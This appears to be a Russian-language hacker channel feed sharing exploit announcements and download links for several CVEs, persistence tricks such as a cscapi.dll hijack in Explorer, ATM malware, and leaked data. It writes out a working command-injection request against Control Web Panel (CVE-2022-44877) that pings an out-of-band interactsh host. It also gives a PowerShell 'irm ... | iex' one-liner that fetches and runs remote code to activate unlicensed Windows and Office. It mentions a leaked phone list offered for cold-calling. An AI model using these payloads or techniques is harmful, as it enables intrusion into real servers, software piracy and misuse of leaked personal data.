Расходимся, мы тут лишние
читать всю статью

CVE-2022-44877
Control Web Panel Unauth RCE
POC usage:

POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.{{interactsh-url}}) HTTP/1.1
Host: vuln
Content-Type: application/x-www-form-urlencoded

username=root&password=toor&commit=Login

CVE-2022-31705
POC
Geekpwn 2022 Vmware EHCI OOB
download

ChatGPT_PoC - продолжаем наблюдение ))))

#openAI

Атаки на банкоматы с использованием вредоносного ПО
AzaZA
все как вы любите

ChatGPT
Ultimate Resource Guide
WoW

Exploit for CVE-2022-20452
privilege escalation on Android from installed app to system app (or another app)
downLoad

#android #exploit

Активация windows и office
Быстрый способ без всяких KMS_auto
usage:
PowerShell от админа и вставляем:

irm https://massgrave.dev/get | iex

и выбираем нужный пункт, ВСЁ

или так
Ну мало ли Вам нужно.

Списки docker образов для прокачки Пентеста
for pentesterts

CVE-2023-0210
В новый год, с новыми дырами
Flaw in Linux Kernel Allows Unauthenticated remote DOS Attacks
POC - ручками наберете

#linux #kernel

CVE-2023-21752
Свежайшая Дыра (от 10 января) в службе резервного копирования Windows
LPE от юзера до системы
About vuln
exploit

#windows #exploit #lpe

CVE-2022-3656
*
Затронуто более 2,5 миллиардов пользователей Google Chrome и браузеров на базе Chromium.
Эта уязвимость позволяет украсть конфиденциальные файлы, такие как зашифрованные кошельки и учетные данные облачного провайдера.

Новость по утечке в mail.ru - шляпа.
И ничего полезного в ней нет. Разве что чисто на прозвон
3505917 строк

охх))) RecycleBin снова в деле ! )

RecyclePersist

Сжато, ёмко, всеобъемлюще, БАЗА !!!))))
Для этих гребаных web-мастеров - motherfuckingwebsite.com
Этому не научат на курсах
Что то даже БаШорг вспомнился версии 2004 года....

#humor #web #lol

ExplorerPersist
перехват загрузки cscapi.dll и как итог - внедрение "нашей" dll с "нашим" функционалом.
Ну а Persistence в том что отрабатывает каждый раз при запуске проводника
download

next generation Firewall - а главное, надежный 😜

Cellebrite & MSAB
Данные от Cellebrite и MSAB, двух компаний, которые предоставляют правительствам инструменты для взлома телефонов, были слиты.
*
Утечка включает в себя фактическое программное обеспечение, а также документацию.
*
Эти инструменты использовались против журналистов, активистов и диссидентов по всему миру.